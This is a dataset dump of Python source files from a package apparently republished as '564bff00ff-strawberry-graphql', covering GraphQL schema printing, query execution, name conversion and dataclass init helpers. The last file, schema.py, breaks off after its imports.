code
stringlengths 501
5.19M
| package
stringlengths 2
81
| path
stringlengths 9
304
| filename
stringlengths 4
145
|
---|---|---|---|
from dataclasses import ( # type: ignore
_FIELD_INITVAR,
_HAS_DEFAULT_FACTORY,
_POST_INIT_NAME,
MISSING,
_create_fn,
_field_init,
_init_param,
)
from typing import Any
def dataclass_init_fn(fields, frozen, has_post_init, self_name, globals_) -> Any:
"""
We create a custom __init__ function for the dataclasses that back
Strawberry object types to only accept keyword arguments. This allows us to
avoid the problem where a type cannot define a field with a default value
before a field that doesn't have a default value.
An example of the problem:
https://stackoverflow.com/questions/51575931/class-inheritance-in-python-3-7-dataclasses
Code is adapted from:
https://github.com/python/cpython/blob/v3.9.6/Lib/dataclasses.py#L489-L536
Note: in Python 3.10 and above we use the `kw_only` argument to achieve the
same result.
"""
# fields contains both real fields and InitVar pseudo-fields.
locals_ = {f"_type_{f.name}": f.type for f in fields}
locals_.update(
{
"MISSING": MISSING,
"_HAS_DEFAULT_FACTORY": _HAS_DEFAULT_FACTORY,
}
)
body_lines = []
for f in fields:
line = _field_init(f, frozen, locals_, self_name)
# line is None means that this field doesn't require
# initialization (it's a pseudo-field). Just skip it.
if line:
body_lines.append(line)
# Does this class have a post-init function?
if has_post_init:
params_str = ",".join(f.name for f in fields if f._field_type is _FIELD_INITVAR)
body_lines.append(f"{self_name}.{_POST_INIT_NAME}({params_str})")
# If no body lines, use 'pass'.
if not body_lines:
body_lines = ["pass"]
_init_params = [_init_param(f) for f in fields if f.init]
if len(_init_params) > 0:
_init_params = ["*", *_init_params]
return _create_fn(
"__init__",
[self_name, *_init_params],
body_lines,
locals=locals_,
globals=globals_,
return_type=None,
) | 564bff00ff-strawberry-graphql | /564bff00ff_strawberry_graphql-0.168.2-py3-none-any.whl/strawberry/ext/dataclasses/dataclasses.py | dataclasses.py |
from __future__ import annotations
import dataclasses
import re
from math import isfinite
from typing import TYPE_CHECKING, Any, Mapping, Optional, cast
from graphql.language import (
BooleanValueNode,
EnumValueNode,
FloatValueNode,
IntValueNode,
ListValueNode,
NameNode,
NullValueNode,
ObjectFieldNode,
ObjectValueNode,
StringValueNode,
)
from graphql.pyutils import Undefined, inspect, is_iterable
from graphql.type import (
GraphQLID,
is_enum_type,
is_input_object_type,
is_leaf_type,
is_list_type,
is_non_null_type,
)
if TYPE_CHECKING:
from graphql.language import ValueNode
from graphql.type import (
GraphQLInputObjectType,
GraphQLInputType,
GraphQLList,
GraphQLNonNull,
)
__all__ = ["ast_from_value"]
_re_integer_string = re.compile("^-?(?:0|[1-9][0-9]*)$")
def ast_from_leaf_type(
serialized: object, type_: Optional[GraphQLInputType]
) -> ValueNode:
# Others serialize based on their corresponding Python scalar types.
if isinstance(serialized, bool):
return BooleanValueNode(value=serialized)
# Python ints and floats correspond nicely to Int and Float values.
if isinstance(serialized, int):
return IntValueNode(value=str(serialized))
if isinstance(serialized, float) and isfinite(serialized):
value = str(serialized)
if value.endswith(".0"):
value = value[:-2]
return FloatValueNode(value=value)
if isinstance(serialized, str):
# Enum types use Enum literals.
if type_ and is_enum_type(type_):
return EnumValueNode(value=serialized)
# ID types can use Int literals.
if type_ is GraphQLID and _re_integer_string.match(serialized):
return IntValueNode(value=serialized)
return StringValueNode(value=serialized)
if isinstance(serialized, dict):
return ObjectValueNode(
fields=[
ObjectFieldNode(
name=NameNode(value=key),
value=ast_from_leaf_type(value, None),
)
for key, value in serialized.items()
]
)
raise TypeError(
f"Cannot convert value to AST: {inspect(serialized)}."
) # pragma: no cover
def ast_from_value(value: Any, type_: GraphQLInputType) -> Optional[ValueNode]:
# custom ast_from_value that allows to also serialize custom scalar that aren't
# basic types, namely JSON scalar types
if is_non_null_type(type_):
type_ = cast("GraphQLNonNull", type_)
ast_value = ast_from_value(value, type_.of_type)
if isinstance(ast_value, NullValueNode):
return None
return ast_value
# only explicit None, not Undefined or NaN
if value is None:
return NullValueNode()
# undefined
if value is Undefined:
return None
# Convert Python list to GraphQL list. If the GraphQLType is a list, but the value
# is not a list, convert the value using the list's item type.
if is_list_type(type_):
type_ = cast("GraphQLList", type_)
item_type = type_.of_type
if is_iterable(value):
maybe_value_nodes = (ast_from_value(item, item_type) for item in value)
value_nodes = tuple(node for node in maybe_value_nodes if node)
return ListValueNode(values=value_nodes)
return ast_from_value(value, item_type)
# Populate the fields of the input object by creating ASTs from each value in the
# Python dict according to the fields in the input type.
if is_input_object_type(type_):
# TODO: is this the right place?
if hasattr(value, "_type_definition"):
value = dataclasses.asdict(value)
if value is None or not isinstance(value, Mapping):
return None
type_ = cast("GraphQLInputObjectType", type_)
field_items = (
(field_name, ast_from_value(value[field_name], field.type))
for field_name, field in type_.fields.items()
if field_name in value
)
field_nodes = tuple(
ObjectFieldNode(name=NameNode(value=field_name), value=field_value)
for field_name, field_value in field_items
if field_value
)
return ObjectValueNode(fields=field_nodes)
if is_leaf_type(type_):
# Since value is an internally represented value, it must be serialized to an
# externally represented value before converting into an AST.
serialized = type_.serialize(value) # type: ignore
if serialized is None or serialized is Undefined:
return None # pragma: no cover
return ast_from_leaf_type(serialized, type_)
# Not reachable. All possible input types have been considered.
raise TypeError(f"Unexpected input type: {inspect(type_)}.") # pragma: no cover | 564bff00ff-strawberry-graphql | /564bff00ff_strawberry_graphql-0.168.2-py3-none-any.whl/strawberry/printer/ast_from_value.py | ast_from_value.py |
from __future__ import annotations
import dataclasses
from itertools import chain
from typing import (
TYPE_CHECKING,
Any,
Dict,
List,
Optional,
Set,
Tuple,
TypeVar,
Union,
cast,
overload,
)
from graphql import is_union_type
from graphql.language.printer import print_ast
from graphql.type import (
is_enum_type,
is_input_type,
is_interface_type,
is_object_type,
is_scalar_type,
is_specified_directive,
)
from graphql.utilities.print_schema import (
is_defined_type,
print_block,
print_deprecated,
print_description,
print_implemented_interfaces,
print_specified_by_url,
)
from graphql.utilities.print_schema import print_type as original_print_type
from strawberry.custom_scalar import ScalarWrapper
from strawberry.enum import EnumDefinition
from strawberry.schema_directive import Location, StrawberrySchemaDirective
from strawberry.type import StrawberryContainer
from strawberry.unset import UNSET
from .ast_from_value import ast_from_value
if TYPE_CHECKING:
from graphql import (
GraphQLArgument,
GraphQLEnumType,
GraphQLEnumValue,
GraphQLScalarType,
GraphQLUnionType,
)
from graphql.type.directives import GraphQLDirective
from strawberry.field import StrawberryField
from strawberry.schema import BaseSchema
_T = TypeVar("_T")
@dataclasses.dataclass
class PrintExtras:
directives: Set[str] = dataclasses.field(default_factory=set)
types: Set[type] = dataclasses.field(default_factory=set)
@overload
def _serialize_dataclasses(value: Dict[_T, object]) -> Dict[_T, object]:
...
@overload
def _serialize_dataclasses(value: Union[List[object], Tuple[object]]) -> List[object]:
...
@overload
def _serialize_dataclasses(value: object) -> object:
...
def _serialize_dataclasses(value):
if dataclasses.is_dataclass(value):
return dataclasses.asdict(value)
if isinstance(value, (list, tuple)):
return [_serialize_dataclasses(v) for v in value]
if isinstance(value, dict):
return {k: _serialize_dataclasses(v) for k, v in value.items()}
return value
def print_schema_directive_params(
directive: GraphQLDirective, values: Dict[str, Any]
) -> str:
params = []
for name, arg in directive.args.items():
value = values.get(name, arg.default_value)
if value is UNSET:
value = None
else:
ast = ast_from_value(_serialize_dataclasses(value), arg.type)
value = ast and f"{name}: {print_ast(ast)}"
if value:
params.append(value)
if not params:
return ""
return "(" + ", ".join(params) + ")"
def print_schema_directive(
directive: Any, schema: BaseSchema, *, extras: PrintExtras
) -> str:
strawberry_directive = cast(
StrawberrySchemaDirective, directive.__class__.__strawberry_directive__
)
schema_converter = schema.schema_converter
gql_directive = schema_converter.from_schema_directive(directive.__class__)
params = print_schema_directive_params(
gql_directive,
{
schema.config.name_converter.get_graphql_name(f): getattr(
directive, f.python_name or f.name, UNSET
)
for f in strawberry_directive.fields
},
)
printed_directive = print_directive(gql_directive, schema=schema)
if printed_directive is not None:
extras.directives.add(printed_directive)
for field in strawberry_directive.fields:
f_type = field.type
while isinstance(f_type, StrawberryContainer):
f_type = f_type.of_type
if hasattr(f_type, "_type_definition"):
extras.types.add(cast(type, f_type))
if hasattr(f_type, "_scalar_definition"):
extras.types.add(cast(type, f_type))
if isinstance(f_type, EnumDefinition):
extras.types.add(cast(type, f_type))
return f" @{gql_directive.name}{params}"
def print_field_directives(
field: Optional[StrawberryField], schema: BaseSchema, *, extras: PrintExtras
) -> str:
if not field:
return ""
directives = (
directive
for directive in field.directives
if any(
location in [Location.FIELD_DEFINITION, Location.INPUT_FIELD_DEFINITION]
for location in directive.__strawberry_directive__.locations # type: ignore
)
)
return "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
def print_argument_directives(
argument: GraphQLArgument, *, schema: BaseSchema, extras: PrintExtras
) -> str:
strawberry_type = argument.extensions.get("strawberry-definition")
directives = strawberry_type.directives if strawberry_type else []
return "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
def print_args(
args: Dict[str, GraphQLArgument],
indentation: str = "",
*,
schema: BaseSchema,
extras: PrintExtras,
) -> str:
if not args:
return ""
# If every arg does not have a description, print them on one line.
if not any(arg.description for arg in args.values()):
return (
"("
+ ", ".join(
(
f"{print_input_value(name, arg)}"
f"{print_argument_directives(arg, schema=schema, extras=extras)}"
)
for name, arg in args.items()
)
+ ")"
)
return (
"(\n"
+ "\n".join(
print_description(arg, f" {indentation}", not i)
+ f" {indentation}"
+ print_input_value(name, arg)
+ print_argument_directives(arg, schema=schema, extras=extras)
for i, (name, arg) in enumerate(args.items())
)
+ f"\n{indentation})"
)
def print_fields(type_, schema: BaseSchema, *, extras: PrintExtras) -> str:
from strawberry.schema.schema_converter import GraphQLCoreConverter
fields = []
for i, (name, field) in enumerate(type_.fields.items()):
strawberry_field = field.extensions and field.extensions.get(
GraphQLCoreConverter.DEFINITION_BACKREF
)
args = (
print_args(field.args, " ", schema=schema, extras=extras)
if hasattr(field, "args")
else ""
)
fields.append(
print_description(field, " ", not i)
+ f" {name}"
+ args
+ f": {field.type}"
+ print_field_directives(strawberry_field, schema=schema, extras=extras)
+ print_deprecated(field.deprecation_reason)
)
return print_block(fields)
def print_scalar(
type_: GraphQLScalarType, *, schema: BaseSchema, extras: PrintExtras
) -> str:
# TODO: refactor this
strawberry_type = type_.extensions.get("strawberry-definition")
directives = strawberry_type.directives if strawberry_type else []
printed_directives = "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
return (
print_description(type_)
+ f"scalar {type_.name}"
+ print_specified_by_url(type_)
+ printed_directives
).strip()
def print_enum_value(
name: str,
value: GraphQLEnumValue,
first_in_block,
*,
schema: BaseSchema,
extras: PrintExtras,
) -> str:
strawberry_type = value.extensions.get("strawberry-definition")
directives = strawberry_type.directives if strawberry_type else []
printed_directives = "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
return (
print_description(value, " ", first_in_block)
+ f" {name}"
+ print_deprecated(value.deprecation_reason)
+ printed_directives
)
def print_enum(
type_: GraphQLEnumType, *, schema: BaseSchema, extras: PrintExtras
) -> str:
strawberry_type = type_.extensions.get("strawberry-definition")
directives = strawberry_type.directives if strawberry_type else []
printed_directives = "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
values = [
print_enum_value(name, value, not i, schema=schema, extras=extras)
for i, (name, value) in enumerate(type_.values.items())
]
return (
print_description(type_)
+ f"enum {type_.name}"
+ printed_directives
+ print_block(values)
)
def print_extends(type_, schema: BaseSchema) -> str:
from strawberry.schema.schema_converter import GraphQLCoreConverter
strawberry_type = type_.extensions and type_.extensions.get(
GraphQLCoreConverter.DEFINITION_BACKREF
)
if strawberry_type and strawberry_type.extend:
return "extend "
return ""
def print_type_directives(type_, schema: BaseSchema, *, extras: PrintExtras) -> str:
from strawberry.schema.schema_converter import GraphQLCoreConverter
strawberry_type = type_.extensions and type_.extensions.get(
GraphQLCoreConverter.DEFINITION_BACKREF
)
if not strawberry_type:
return ""
allowed_locations = (
[Location.INPUT_OBJECT] if strawberry_type.is_input else [Location.OBJECT]
)
directives = (
directive
for directive in strawberry_type.directives or []
if any(
location in allowed_locations
for location in directive.__strawberry_directive__.locations
)
)
return "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
def _print_object(type_, schema: BaseSchema, *, extras: PrintExtras) -> str:
return (
print_description(type_)
+ print_extends(type_, schema)
+ f"type {type_.name}"
+ print_implemented_interfaces(type_)
+ print_type_directives(type_, schema, extras=extras)
+ print_fields(type_, schema, extras=extras)
)
def _print_interface(type_, schema: BaseSchema, *, extras: PrintExtras) -> str:
return (
print_description(type_)
+ print_extends(type_, schema)
+ f"interface {type_.name}"
+ print_implemented_interfaces(type_)
+ print_type_directives(type_, schema, extras=extras)
+ print_fields(type_, schema, extras=extras)
)
def print_input_value(name: str, arg: GraphQLArgument) -> str:
default_ast = ast_from_value(arg.default_value, arg.type)
arg_decl = f"{name}: {arg.type}"
if default_ast:
arg_decl += f" = {print_ast(default_ast)}"
return arg_decl + print_deprecated(arg.deprecation_reason)
def _print_input_object(type_, schema: BaseSchema, *, extras: PrintExtras) -> str:
from strawberry.schema.schema_converter import GraphQLCoreConverter
fields = []
for i, (name, field) in enumerate(type_.fields.items()):
strawberry_field = field.extensions and field.extensions.get(
GraphQLCoreConverter.DEFINITION_BACKREF
)
fields.append(
print_description(field, " ", not i)
+ " "
+ print_input_value(name, field)
+ print_field_directives(strawberry_field, schema=schema, extras=extras)
)
return (
print_description(type_)
+ f"input {type_.name}"
+ print_type_directives(type_, schema, extras=extras)
+ print_block(fields)
)
def print_union(
type_: GraphQLUnionType, *, schema: BaseSchema, extras: PrintExtras
) -> str:
strawberry_type = type_.extensions.get("strawberry-definition")
directives = strawberry_type.directives if strawberry_type else []
printed_directives = "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
types = type_.types
possible_types = " = " + " | ".join(t.name for t in types) if types else ""
return (
print_description(type_)
+ f"union {type_.name}{printed_directives}"
+ possible_types
)
def _print_type(type_, schema: BaseSchema, *, extras: PrintExtras) -> str:
# prevents us from trying to print a scalar as an input type
if is_scalar_type(type_):
return print_scalar(type_, schema=schema, extras=extras)
if is_enum_type(type_):
return print_enum(type_, schema=schema, extras=extras)
if is_object_type(type_):
return _print_object(type_, schema, extras=extras)
if is_input_type(type_):
return _print_input_object(type_, schema, extras=extras)
if is_interface_type(type_):
return _print_interface(type_, schema, extras=extras)
if is_union_type(type_):
return print_union(type_, schema=schema, extras=extras)
return original_print_type(type_)
def print_schema_directives(schema: BaseSchema, *, extras: PrintExtras) -> str:
directives = (
directive
for directive in schema.schema_directives
if any(
location in [Location.SCHEMA]
for location in directive.__strawberry_directive__.locations # type: ignore
)
)
return "".join(
print_schema_directive(directive, schema=schema, extras=extras)
for directive in directives
)
def _all_root_names_are_common_names(schema: BaseSchema) -> bool:
query = schema.query._type_definition
mutation = schema.mutation._type_definition if schema.mutation else None
subscription = schema.subscription._type_definition if schema.subscription else None
return (
query.name == "Query"
and (mutation is None or mutation.name == "Mutation")
and (subscription is None or subscription.name == "Subscription")
)
def print_schema_definition(
schema: BaseSchema, *, extras: PrintExtras
) -> Optional[str]:
# TODO: add support for description
if _all_root_names_are_common_names(schema) and not schema.schema_directives:
return None
query_type = schema.query._type_definition
operation_types = [f" query: {query_type.name}"]
if schema.mutation:
mutation_type = schema.mutation._type_definition
operation_types.append(f" mutation: {mutation_type.name}")
if schema.subscription:
subscription_type = schema.subscription._type_definition
operation_types.append(f" subscription: {subscription_type.name}")
directives = print_schema_directives(schema, extras=extras)
return f"schema{directives} {{\n" + "\n".join(operation_types) + "\n}"
def print_directive(
directive: GraphQLDirective, *, schema: BaseSchema
) -> Optional[str]:
strawberry_directive = directive.extensions["strawberry-definition"]
if (
isinstance(strawberry_directive, StrawberrySchemaDirective)
and not strawberry_directive.print_definition
):
return None
return (
print_description(directive)
+ f"directive @{directive.name}"
# TODO: add support for directives on arguments directives
+ print_args(directive.args, schema=schema, extras=PrintExtras())
+ (" repeatable" if directive.is_repeatable else "")
+ " on "
+ " | ".join(location.name for location in directive.locations)
)
def is_builtin_directive(directive: GraphQLDirective) -> bool:
# this allows to force print the builtin directives if there's a
# directive that was implemented using the schema_directive
if is_specified_directive(directive):
strawberry_definition = directive.extensions.get("strawberry-definition")
return strawberry_definition is None
return False
def print_schema(schema: BaseSchema) -> str:
graphql_core_schema = schema._schema # type: ignore
extras = PrintExtras()
directives = filter(
lambda n: not is_builtin_directive(n), graphql_core_schema.directives
)
type_map = graphql_core_schema.type_map
types = filter(is_defined_type, map(type_map.get, sorted(type_map)))
types_printed = [_print_type(type_, schema, extras=extras) for type_ in types]
schema_definition = print_schema_definition(schema, extras=extras)
directives = filter(
None, [print_directive(directive, schema=schema) for directive in directives]
)
def _name_getter(type_: Any):
if hasattr(type_, "name"):
return type_.name
if isinstance(type_, ScalarWrapper):
return type_._scalar_definition.name
return type_.__name__
return "\n\n".join(
chain(
sorted(extras.directives),
filter(None, [schema_definition]),
directives,
types_printed,
(
_print_type(
schema.schema_converter.from_type(type_), schema, extras=extras
)
# Make sure extra types are ordered for predictive printing
for type_ in sorted(extras.types, key=_name_getter)
),
)
) | 564bff00ff-strawberry-graphql | /564bff00ff_strawberry_graphql-0.168.2-py3-none-any.whl/strawberry/printer/printer.py | printer.py |
from __future__ import annotations
from asyncio import ensure_future
from inspect import isawaitable
from typing import (
TYPE_CHECKING,
Awaitable,
Callable,
Iterable,
List,
Optional,
Sequence,
Tuple,
Type,
Union,
cast,
)
from graphql import GraphQLError, parse
from graphql import execute as original_execute
from graphql.validation import validate
from strawberry.exceptions import MissingQueryError
from strawberry.extensions.runner import SchemaExtensionsRunner
from strawberry.types import ExecutionResult
from .exceptions import InvalidOperationTypeError
if TYPE_CHECKING:
from graphql import ExecutionContext as GraphQLExecutionContext
from graphql import ExecutionResult as GraphQLExecutionResult
from graphql import GraphQLSchema
from graphql.language import DocumentNode
from graphql.validation import ASTValidationRule
from strawberry.extensions import SchemaExtension
from strawberry.types import ExecutionContext
from strawberry.types.graphql import OperationType
def parse_document(query: str) -> DocumentNode:
return parse(query)
def validate_document(
schema: GraphQLSchema,
document: DocumentNode,
validation_rules: Tuple[Type[ASTValidationRule], ...],
) -> List[GraphQLError]:
return validate(
schema,
document,
validation_rules,
)
def _run_validation(execution_context: ExecutionContext) -> None:
# Check if there are any validation rules or if validation has
# already been run by an extension
if len(execution_context.validation_rules) > 0 and execution_context.errors is None:
assert execution_context.graphql_document
execution_context.errors = validate_document(
execution_context.schema._schema,
execution_context.graphql_document,
execution_context.validation_rules,
)
async def execute(
schema: GraphQLSchema,
*,
allowed_operation_types: Iterable[OperationType],
extensions: Sequence[Union[Type[SchemaExtension], SchemaExtension]],
execution_context: ExecutionContext,
execution_context_class: Optional[Type[GraphQLExecutionContext]] = None,
process_errors: Callable[[List[GraphQLError], Optional[ExecutionContext]], None],
) -> ExecutionResult:
extensions_runner = SchemaExtensionsRunner(
execution_context=execution_context,
extensions=list(extensions),
)
async with extensions_runner.operation():
# Note: In graphql-core the schema would be validated here but in
# Strawberry we are validating it at initialisation time instead
if not execution_context.query:
raise MissingQueryError()
async with extensions_runner.parsing():
try:
if not execution_context.graphql_document:
execution_context.graphql_document = parse_document(
execution_context.query
)
except GraphQLError as error:
execution_context.errors = [error]
process_errors([error], execution_context)
return ExecutionResult(
data=None,
errors=[error],
extensions=await extensions_runner.get_extensions_results(),
)
except Exception as error: # pragma: no cover
error = GraphQLError(str(error), original_error=error)
execution_context.errors = [error]
process_errors([error], execution_context)
return ExecutionResult(
data=None,
errors=[error],
extensions=await extensions_runner.get_extensions_results(),
)
if execution_context.operation_type not in allowed_operation_types:
raise InvalidOperationTypeError(execution_context.operation_type)
async with extensions_runner.validation():
_run_validation(execution_context)
if execution_context.errors:
process_errors(execution_context.errors, execution_context)
return ExecutionResult(data=None, errors=execution_context.errors)
async with extensions_runner.executing():
if not execution_context.result:
result = original_execute(
schema,
execution_context.graphql_document,
root_value=execution_context.root_value,
middleware=extensions_runner.as_middleware_manager(),
variable_values=execution_context.variables,
operation_name=execution_context.operation_name,
context_value=execution_context.context,
execution_context_class=execution_context_class,
)
if isawaitable(result):
result = await cast(Awaitable["GraphQLExecutionResult"], result)
result = cast("GraphQLExecutionResult", result)
execution_context.result = result
# Also set errors on the execution_context so that it's easier
# to access in extensions
if result.errors:
execution_context.errors = result.errors
# Run the `Schema.process_errors` function here before
# extensions have a chance to modify them (see the MaskErrors
# extension). That way we can log the original errors but
# only return a sanitised version to the client.
process_errors(result.errors, execution_context)
return ExecutionResult(
data=execution_context.result.data,
errors=execution_context.result.errors,
extensions=await extensions_runner.get_extensions_results(),
)
def execute_sync(
schema: GraphQLSchema,
*,
allowed_operation_types: Iterable[OperationType],
extensions: Sequence[Union[Type[SchemaExtension], SchemaExtension]],
execution_context: ExecutionContext,
execution_context_class: Optional[Type[GraphQLExecutionContext]] = None,
process_errors: Callable[[List[GraphQLError], Optional[ExecutionContext]], None],
) -> ExecutionResult:
extensions_runner = SchemaExtensionsRunner(
execution_context=execution_context,
extensions=list(extensions),
)
with extensions_runner.operation():
# Note: In graphql-core the schema would be validated here but in
# Strawberry we are validating it at initialisation time instead
if not execution_context.query:
raise MissingQueryError()
with extensions_runner.parsing():
try:
if not execution_context.graphql_document:
execution_context.graphql_document = parse_document(
execution_context.query
)
except GraphQLError as error:
execution_context.errors = [error]
process_errors([error], execution_context)
return ExecutionResult(
data=None,
errors=[error],
extensions=extensions_runner.get_extensions_results_sync(),
)
except Exception as error: # pragma: no cover
error = GraphQLError(str(error), original_error=error)
execution_context.errors = [error]
process_errors([error], execution_context)
return ExecutionResult(
data=None,
errors=[error],
extensions=extensions_runner.get_extensions_results_sync(),
)
if execution_context.operation_type not in allowed_operation_types:
raise InvalidOperationTypeError(execution_context.operation_type)
with extensions_runner.validation():
_run_validation(execution_context)
if execution_context.errors:
process_errors(execution_context.errors, execution_context)
return ExecutionResult(data=None, errors=execution_context.errors)
with extensions_runner.executing():
if not execution_context.result:
result = original_execute(
schema,
execution_context.graphql_document,
root_value=execution_context.root_value,
middleware=extensions_runner.as_middleware_manager(),
variable_values=execution_context.variables,
operation_name=execution_context.operation_name,
context_value=execution_context.context,
execution_context_class=execution_context_class,
)
if isawaitable(result):
result = cast(Awaitable["GraphQLExecutionResult"], result)
ensure_future(result).cancel()
raise RuntimeError(
"GraphQL execution failed to complete synchronously."
)
result = cast("GraphQLExecutionResult", result)
execution_context.result = result
# Also set errors on the execution_context so that it's easier
# to access in extensions
if result.errors:
execution_context.errors = result.errors
# Run the `Schema.process_errors` function here before
# extensions have a chance to modify them (see the MaskErrors
# extension). That way we can log the original errors but
# only return a sanitised version to the client.
process_errors(result.errors, execution_context)
return ExecutionResult(
data=execution_context.result.data,
errors=execution_context.result.errors,
extensions=extensions_runner.get_extensions_results_sync(),
) | 564bff00ff-strawberry-graphql | /564bff00ff_strawberry_graphql-0.168.2-py3-none-any.whl/strawberry/schema/execute.py | execute.py |
from __future__ import annotations
from typing import TYPE_CHECKING, List, Optional, Union, cast
from typing_extensions import Protocol
from strawberry.custom_scalar import ScalarDefinition
from strawberry.directive import StrawberryDirective
from strawberry.enum import EnumDefinition
from strawberry.lazy_type import LazyType
from strawberry.schema_directive import StrawberrySchemaDirective
from strawberry.type import StrawberryList, StrawberryOptional
from strawberry.types.types import TypeDefinition
from strawberry.union import StrawberryUnion
from strawberry.utils.str_converters import capitalize_first, to_camel_case
from strawberry.utils.typing import eval_type
if TYPE_CHECKING:
from strawberry.arguments import StrawberryArgument
from strawberry.field import StrawberryField
from strawberry.type import StrawberryType
class HasGraphQLName(Protocol):
python_name: str
graphql_name: Optional[str]
class NameConverter:
def __init__(self, auto_camel_case: bool = True) -> None:
self.auto_camel_case = auto_camel_case
def apply_naming_config(self, name: str) -> str:
if self.auto_camel_case:
name = to_camel_case(name)
return name
def from_type(
self,
type_: Union[StrawberryType, StrawberryDirective, StrawberryDirective],
) -> str:
if isinstance(type_, (StrawberryDirective, StrawberrySchemaDirective)):
return self.from_directive(type_)
if isinstance(type_, EnumDefinition): # TODO: Replace with StrawberryEnum
return self.from_enum(type_)
elif isinstance(type_, TypeDefinition):
if type_.is_input:
return self.from_input_object(type_)
if type_.is_interface:
return self.from_interface(type_)
return self.from_object(type_)
elif isinstance(type_, StrawberryUnion):
return self.from_union(type_)
elif isinstance(type_, ScalarDefinition): # TODO: Replace with StrawberryScalar
return self.from_scalar(type_)
else:
return str(type_)
def from_argument(self, argument: StrawberryArgument) -> str:
return self.get_graphql_name(argument)
def from_object(self, object_type: TypeDefinition) -> str:
if object_type.concrete_of:
return self.from_generic(
object_type, list(object_type.type_var_map.values())
)
return object_type.name
def from_input_object(self, input_type: TypeDefinition) -> str:
return self.from_object(input_type)
def from_interface(self, interface: TypeDefinition) -> str:
return self.from_object(interface)
def from_enum(self, enum: EnumDefinition) -> str:
return enum.name
def from_directive(
self, directive: Union[StrawberryDirective, StrawberrySchemaDirective]
) -> str:
name = self.get_graphql_name(directive)
if self.auto_camel_case:
# we don't want the first letter to be uppercase for directives
return name[0].lower() + name[1:]
return name
def from_scalar(self, scalar: ScalarDefinition) -> str:
return scalar.name
def from_field(self, field: StrawberryField) -> str:
return self.get_graphql_name(field)
def from_union(self, union: StrawberryUnion) -> str:
if union.graphql_name is not None:
return union.graphql_name
name = ""
for type_ in union.types:
if isinstance(type_, LazyType):
type_ = cast("StrawberryType", type_.resolve_type()) # noqa: PLW2901
if hasattr(type_, "_type_definition"):
type_name = self.from_type(type_._type_definition)
else:
# This should only be hit when generating names for type-related
# exceptions
type_name = self.from_type(type_)
name += type_name
return name
def from_generic(
self, generic_type: TypeDefinition, types: List[Union[StrawberryType, type]]
) -> str:
generic_type_name = generic_type.name
names: List[str] = []
for type_ in types:
name = self.get_from_type(type_)
names.append(name)
return "".join(names) + generic_type_name
def get_from_type(self, type_: Union[StrawberryType, type]) -> str:
type_ = eval_type(type_)
if isinstance(type_, LazyType):
name = type_.type_name
elif isinstance(type_, EnumDefinition):
name = type_.name
elif isinstance(type_, StrawberryUnion):
# TODO: test Generics with unnamed unions
assert type_.graphql_name
name = type_.graphql_name
elif isinstance(type_, StrawberryList):
name = self.get_from_type(type_.of_type) + "List"
elif isinstance(type_, StrawberryOptional):
name = self.get_from_type(type_.of_type) + "Optional"
elif hasattr(type_, "_scalar_definition"):
strawberry_type = type_._scalar_definition
name = strawberry_type.name
elif hasattr(type_, "_type_definition"):
strawberry_type = type_._type_definition
if (
strawberry_type.is_generic
and not strawberry_type.is_specialized_generic
):
types = type_.__args__
name = self.from_generic(strawberry_type, types)
elif (
strawberry_type.concrete_of
and not strawberry_type.is_specialized_generic
):
types = list(strawberry_type.type_var_map.values())
name = self.from_generic(strawberry_type, types)
else:
name = strawberry_type.name
else:
name = type_.__name__
return capitalize_first(name)
def get_graphql_name(self, obj: HasGraphQLName) -> str:
if obj.graphql_name is not None:
return obj.graphql_name
assert obj.python_name
return self.apply_naming_config(obj.python_name) | 564bff00ff-strawberry-graphql | /564bff00ff_strawberry_graphql-0.168.2-py3-none-any.whl/strawberry/schema/name_converter.py | name_converter.py |
from __future__ import annotations
from abc import abstractmethod
from functools import lru_cache
from typing import TYPE_CHECKING, Any, Dict, Iterable, List, Optional, Type, Union
from typing_extensions import Protocol
from strawberry.utils.logging import StrawberryLogger
if TYPE_CHECKING:
from graphql import GraphQLError
from strawberry.custom_scalar import ScalarDefinition
from strawberry.directive import StrawberryDirective
from strawberry.enum import EnumDefinition
from strawberry.schema.schema_converter import GraphQLCoreConverter
from strawberry.types import ExecutionContext, ExecutionResult
from strawberry.types.graphql import OperationType
from strawberry.types.types import TypeDefinition
from strawberry.union import StrawberryUnion
from .config import StrawberryConfig
class BaseSchema(Protocol):
config: StrawberryConfig
schema_converter: GraphQLCoreConverter
query: Type
mutation: Optional[Type]
subscription: Optional[Type]
schema_directives: List[object]
@abstractmethod
async def execute(
self,
query: Optional[str],
variable_values: Optional[Dict[str, Any]] = None,
context_value: Optional[Any] = None,
root_value: Optional[Any] = None,
operation_name: Optional[str] = None,
allowed_operation_types: Optional[Iterable[OperationType]] = None,
) -> ExecutionResult:
raise NotImplementedError
@abstractmethod
def execute_sync(
self,
query: Optional[str],
variable_values: Optional[Dict[str, Any]] = None,
context_value: Optional[Any] = None,
root_value: Optional[Any] = None,
operation_name: Optional[str] = None,
allowed_operation_types: Optional[Iterable[OperationType]] = None,
) -> ExecutionResult:
raise NotImplementedError
@abstractmethod
async def subscribe(
self,
query: str,
variable_values: Optional[Dict[str, Any]] = None,
context_value: Optional[Any] = None,
root_value: Optional[Any] = None,
operation_name: Optional[str] = None,
) -> Any:
raise NotImplementedError
@abstractmethod
def get_type_by_name(
self, name: str
) -> Optional[
Union[TypeDefinition, ScalarDefinition, EnumDefinition, StrawberryUnion]
]:
raise NotImplementedError
@abstractmethod
@lru_cache()
def get_directive_by_name(self, graphql_name: str) -> Optional[StrawberryDirective]:
raise NotImplementedError
@abstractmethod
def as_str(self) -> str:
raise NotImplementedError
def process_errors(
self,
errors: List[GraphQLError],
execution_context: Optional[ExecutionContext] = None,
) -> None:
for error in errors:
StrawberryLogger.error(error, execution_context) | 564bff00ff-strawberry-graphql | /564bff00ff_strawberry_graphql-0.168.2-py3-none-any.whl/strawberry/schema/base.py | base.py |
from __future__ import annotations
import warnings
from functools import lru_cache
from typing import (
TYPE_CHECKING,
Any,
AsyncIterator,
Dict,
Iterable,
List,
Optional,
Type,
Union,
cast,
)
from graphql import (
GraphQLNamedType,
GraphQLNonNull,
GraphQLSchema,
get_introspection_query,
parse,
validate_schema,
)
from graphql.subscription import subscribe
